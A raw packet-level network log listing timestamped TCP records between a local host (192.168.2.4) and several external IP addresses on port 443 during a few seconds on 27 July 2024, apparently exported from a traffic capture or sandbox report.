Jul 27, 2024 08:54:34.109339952 CEST	443	50723	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:34.117101908 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.117117882 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.118156910 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.141549110 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.188494921 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.449043036 CEST	50726	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:34.449155092 CEST	443	50726	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:34.449233055 CEST	50726	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:34.449645996 CEST	50726	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:34.449702024 CEST	443	50726	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:34.454586029 CEST	443	50725	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:34.454796076 CEST	50725	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:34.457294941 CEST	50725	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:34.457345963 CEST	443	50725	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:34.457402945 CEST	50725	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:34.457416058 CEST	443	50725	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:34.458374977 CEST	443	50725	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:34.458700895 CEST	50725	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:34.458780050 CEST	443	50725	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:34.646682978 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.650835037 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.650922060 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.650935888 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.654958963 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.655189991 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.655205965 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.655513048 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.660676956 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.660773993 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.671720982 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.671878099 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.762083054 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.762335062 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.763544083 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.763722897 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.765449047 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.765685081 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.768135071 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.768229961 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.768335104 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.768335104 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.768351078 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.770098925 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.770169020 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.770184040 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.770998955 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.771377087 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.771644115 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.779202938 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.779301882 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.784782887 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.784898996 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.823734999 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.823926926 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.824923038 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.825057030 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.826951027 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.827014923 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.828006029 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.828134060 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.829721928 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.829796076 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.831324100 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.831504107 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.833834887 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.833894968 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.833908081 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.833960056 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.842796087 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.844446898 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.846698046 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.846895933 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.853219986 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.853440046 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.857095003 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.857166052 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.860737085 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.860811949 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.866545916 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.866616011 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.870079994 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.870201111 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.875643969 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.875768900 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.907021046 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.907181978 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.911731958 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.911791086 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.912580967 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.912651062 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.914505959 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.914810896 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.916054964 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.916501045 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.919394016 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.919414043 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.919450998 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.919459105 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.919879913 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.919888973 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.920099974 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.920773029 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.920840025 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.924839020 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.924911976 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.925437927 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.925635099 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.928879976 CEST	443	50726	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:34.929033041 CEST	50726	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:34.929692030 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.929815054 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.932199001 CEST	50726	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:34.932226896 CEST	443	50726	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:34.932813883 CEST	443	50726	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:34.933017969 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.933141947 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.933646917 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.934279919 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.934508085 CEST	50726	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:34.934670925 CEST	50726	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:34.934731007 CEST	443	50726	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:34.937199116 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.937345982 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.940356970 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.940454006 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.943243980 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.943306923 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.943747044 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.944495916 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.946974039 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.947187901 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.950158119 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.950866938 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.950931072 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.950931072 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.950943947 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.953814983 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.954329014 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.954339027 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.954511881 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.956562996 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.956746101 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.957391024 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.958008051 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.960522890 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.960728884 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.962496042 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.963288069 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.994414091 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.994558096 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.998827934 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.999167919 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:34.999435902 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:34.999676943 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.000459909 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.000516891 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.001418114 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.001657009 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.002185106 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.002887011 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.003010988 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.003524065 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.003799915 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.004000902 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.004620075 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.004920959 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.005383015 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.006011963 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.006192923 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.006387949 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.007385969 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.007478952 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.007735968 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.007829905 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.008505106 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.009010077 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.009392023 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.009542942 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.009797096 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.010272026 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.010502100 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.012245893 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.012506962 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.012738943 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.012794018 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.012835026 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.012897015 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.012907982 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.012965918 CEST	443	50724	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:35.013063908 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.023499012 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:35.357568979 CEST	443	50726	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:35.357764959 CEST	443	50726	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:35.357852936 CEST	50726	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:35.358897924 CEST	50726	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:35.358937025 CEST	443	50726	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:35.700510979 CEST	443	50725	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:35.700666904 CEST	443	50725	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:35.700858116 CEST	50725	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:35.714036942 CEST	50725	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:35.714037895 CEST	50725	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:35.714099884 CEST	443	50725	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:35.714134932 CEST	443	50725	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:35.811744928 CEST	50727	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:35.811785936 CEST	443	50727	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:35.811912060 CEST	50727	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:35.816508055 CEST	50727	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:35.816529989 CEST	443	50727	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:35.822478056 CEST	50728	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:35.822557926 CEST	443	50728	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:35.822691917 CEST	50728	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:35.823132992 CEST	50728	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:35.823167086 CEST	443	50728	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:36.320790052 CEST	443	50727	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:36.320878029 CEST	50727	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:36.451098919 CEST	443	50728	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:36.451318979 CEST	50728	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:36.478533983 CEST	50728	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:36.478600025 CEST	443	50728	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:36.478764057 CEST	50728	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:36.478771925 CEST	443	50728	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:36.479576111 CEST	443	50728	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:36.479727983 CEST	50728	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:36.479738951 CEST	443	50728	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:36.500633955 CEST	50727	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:36.500701904 CEST	443	50727	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:36.501615047 CEST	443	50727	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:36.502677917 CEST	50727	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:36.502836943 CEST	50727	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:36.502922058 CEST	443	50727	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:36.503251076 CEST	50727	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:36.503267050 CEST	443	50727	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:36.881253958 CEST	50724	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:36.908190012 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:36.908271074 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:36.908375025 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:36.908746004 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:36.908776999 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:37.047818899 CEST	443	50727	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:37.048055887 CEST	443	50727	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:37.048096895 CEST	50727	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:37.048156023 CEST	50727	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:37.756973028 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:37.765032053 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:37.765058994 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:37.769115925 CEST	443	50728	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:37.769277096 CEST	443	50728	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:37.769372940 CEST	50728	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:37.786266088 CEST	50728	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:37.786266088 CEST	50728	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:37.786329031 CEST	443	50728	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:37.786364079 CEST	443	50728	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:37.864857912 CEST	50730	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:37.864938021 CEST	443	50730	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:37.865025043 CEST	50730	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:37.865319967 CEST	50730	443	192.168.2.4	188.114.97.3
Jul 27, 2024 08:54:37.865343094 CEST	443	50730	188.114.97.3	192.168.2.4
Jul 27, 2024 08:54:37.900872946 CEST	50731	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:37.900893927 CEST	443	50731	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:37.900954962 CEST	50731	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:37.901374102 CEST	50731	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:37.901385069 CEST	443	50731	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:38.078891993 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.079031944 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.079118967 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.079152107 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.079550028 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.079612017 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.079624891 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.079989910 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.080641985 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.080715895 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.148803949 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.148893118 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.149205923 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.149274111 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.151535034 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.151595116 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.152031898 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.152093887 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.161398888 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.161473036 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.161807060 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.161863089 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.171977997 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.172054052 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.177550077 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.177622080 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.188565016 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.188630104 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.237728119 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.237863064 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.238949060 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.239015102 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.239139080 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.239197016 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.239921093 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.239986897 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.240691900 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.240748882 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.241390944 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.241456985 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.241844893 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.241903067 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.242741108 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.242808104 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.250260115 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.250339985 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.254249096 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.254314899 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.261691093 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.261768103 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.273416996 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.273484945 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.273866892 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.273924112 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.274938107 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.275013924 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.278577089 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.278655052 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.330022097 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.330127001 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.330327988 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.330420017 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.330769062 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.330836058 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.330935955 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.330996990 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.331811905 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.331871986 CEST	50729	443	192.168.2.4	31.14.70.245
Jul 27, 2024 08:54:38.332541943 CEST	443	50729	31.14.70.245	192.168.2.4
Jul 27, 2024 08:54:38.332597971 CEST	50729	443	192.168.2.4	31.14.70.245
